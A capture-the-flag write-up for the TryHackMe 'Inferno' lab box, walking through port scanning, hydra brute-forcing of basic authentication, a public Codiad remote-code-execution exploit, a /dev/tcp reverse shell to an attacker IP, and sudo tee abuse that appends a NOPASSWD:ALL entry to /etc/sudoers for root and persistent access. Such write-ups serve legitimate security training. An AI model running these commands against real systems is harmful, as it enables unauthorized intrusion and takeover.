Inferno TryHackMe Writeup
TryHackMe Inferno Writeup
This writeup will help you solve the Inferno box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file.
echo “<box_ip> inferno.thm” >> /etc/hosts
Enumeration
As per usual, we start by running a port scan on the host using nmap. The sC and sV flags indicate that basic vulnerability scripts are executed against the target and that the port scan tries to find version information.
nmap -sV -sC inferno.thm
The output of the scan can be seen below:
PORT STATE SERVICE REASON VERSION
21/tcp open tcpwrapped syn-ack
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBR1uDh8+UHIoUl3J5AJApSgrmxFtvWtauxjTLxH9B5s9E0SThz3fljXo7uSL+2hjphfHyqrdAxoCGQJgRn/o5xGDSpoSoORBIxv1LVaZJlt/eIEhjDP48NP9l/wTRki9zZl5sNVyyyy/lobAj6BYH+dU3g++2su9Wcl0wmFChG5B2Kjrd9VSr6TC0XJpGfQxu+xJy29XtoTzKEiZCoLz3mZT7UqwsSgk38aZjEMKP9QDc0oa5v4JmKy4ikaR90CAcey9uIq8YQtSj+US7hteruG/HLo1AmOn9U3JAsVTd4vI1kp+Uu2vWLaWWjhfPqvbKEV/fravKSPd0EQJmg1eJ
| 256 de:4f:ee:fa:86:2e:fb:bd:4c:dc:f9:67:73:02:84:34 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKFhVdH50NAu45yKvSeeMqyvWl1aCZ1wyrHw2MzGY5DVosjZf/rUzrdDRS0u9QoIO4MpQAvEi7w7YG7zajosRN8=
| 256 e2:6d:8d:e1:a8:d0:bd:97:cb:9a:bc:03:c3:f8:d8:85 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdzynTIlsSkYKaqfCAdSx5J2nfdoWFw1FcpKFIF8LRv
23/tcp open tcpwrapped syn-ack
25/tcp open tcpwrapped syn-ack
|_smtp-commands: Couldn’t establish connection on port 25
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante’s Inferno
88/tcp open tcpwrapped syn-ack
106/tcp open pop3pw? syn-ack
110/tcp open tcpwrapped syn-ack
389/tcp open tcpwrapped syn-ack
464/tcp open tcpwrapped syn-ack
636/tcp open tcpwrapped syn-ack
777/tcp open tcpwrapped syn-ack
783/tcp open tcpwrapped syn-ack
808/tcp open ccproxy-http? syn-ack
873/tcp open tcpwrapped syn-ack
1001/tcp open webpush? syn-ack
1236/tcp open tcpwrapped syn-ack
1300/tcp open tcpwrapped syn-ack
2000/tcp open tcpwrapped syn-ack
2003/tcp open tcpwrapped syn-ack
2121/tcp open tcpwrapped syn-ack
2601/tcp open tcpwrapped syn-ack
2602/tcp open tcpwrapped syn-ack
2604/tcp open tcpwrapped syn-ack
2605/tcp open tcpwrapped syn-ack
2607/tcp open tcpwrapped syn-ack
2608/tcp open tcpwrapped syn-ack
4224/tcp open tcpwrapped syn-ack
5051/tcp open tcpwrapped syn-ack
5432/tcp open tcpwrapped syn-ack
5555/tcp open tcpwrapped syn-ack
5666/tcp open tcpwrapped syn-ack
6346/tcp open tcpwrapped syn-ack
6566/tcp open tcpwrapped syn-ack
6667/tcp open tcpwrapped syn-ack
|_irc-info: Unable to open connection
8021/tcp open tcpwrapped syn-ack
8081/tcp open tcpwrapped syn-ack
|_mcafee-epo-agent: ePO Agent not found
8088/tcp open radan-http? syn-ack
9418/tcp open tcpwrapped syn-ack
10000/tcp open tcpwrapped syn-ack
10082/tcp open tcpwrapped syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are a lot of open ports. For now, we start by enumerating the web server on port 80. Browse to http://inferno.thm/ to find the following webpage:
Viewing the Page Source did not reveal anything useful. Let’s try to use gobuster to find hidden directories and files. Run:
gobuster dir -u http://inferno.thm/ -w /usr/share/wordlists/directory-list-2.3-medium.txt
The output of this scan can be seen below:
/inferno (Status: 401)
We find one hidden path that is only accessible by providing the Basic Authentication credentials. We do not have those yet, so let’s use hydra to brute-force the credentials. Run:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f inferno.thm http-get /inferno/ -t 64
You should now see the following output:
[80][http-get] host: <BOX_IP> login: admin password: <REDACTED>
Provide these credentials when browsing to http://inferno.thm/inferno. You should now see the following webpage:
We find another login screen. Let’s try the credentials we just found again, because users sometimes re-use their password and username combinations for other applications. We are in luck! The same credentials will get past the login screen. You should now see the following page:
We can view some files on the system. The title tag in the head of the webpage shows us that we are dealing with something called Codiad. Searching this name on the internet shows us that we are dealing with a web IDE called: Codiad. Knowing this, I stumbled upon the following exploit. You can start a reverse shell using this code. Run the following:
git clone https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit.git
cd Codiad-Remote-Code-Execute-Exploit
Run:
python2 exploit.py http://admin:<REDACTED>@inferno.thm/inferno/ ‘admin’ ‘<REDACTED>’ <ATTACK_IP> 9001 linux
Before hitting the y key, open two new terminals. In the first terminal run:
echo ‘bash -c “bash -i >/dev/tcp/10.9.8.169/9002 0>&1 2>&1”’ | nc -lnvp 9001
In the second terminal run:
nc -lnvp 9002
After a short moment, you should receive a shell in the last terminal window. Elevate your shell by running:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm-256color
CTRL+Z
stty raw -echo;fg
ENTER
ENTER
Please note that the uppercase words are not commands, but keys combinations on your keyboard
User flag
When looking at interesting files and directories on the server I found the /home/dante/Downloads/.download.dat file. The file contains a set of Hexadecimal values which decode to:
«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.
«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.
Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.
Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».
dante:<REDACTED>
This file provided the SSH credentials for the dante user. Log into the server using SSH by running:
ssh dante@inferno.thm
The user flag is named local.txt and is located in /home/dante/local.txt.
Root flag
Run sudo -l to find which commands we are allowed to run as other users. The output should be as followed:
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dante may run the following commands on Inferno:
(root) NOPASSWD: /usr/bin/tee
We can abuse the tee command to become the root user by checking the possible elevations of GTFObins. You can now edit the /etc/sudoers file to give the dante user all privileges. Run:
echo ‘dante ALL=(ALL) NOPASSWD:ALL’ | sudo tee -a /etc/sudoers
Now elevate privileges by running sudo su and provide your password. Please make sure to delete the /var/www/html/machine_services1320.sh file to maintain access to the system. The script logs off all users from the system using the pkill bash command. The final flag is located at /root/proof.txt.
This box was fun to root! Despite showing lots of open ports, only 2 were of real use for our exploitation. I also learned how to maintain access to the system.
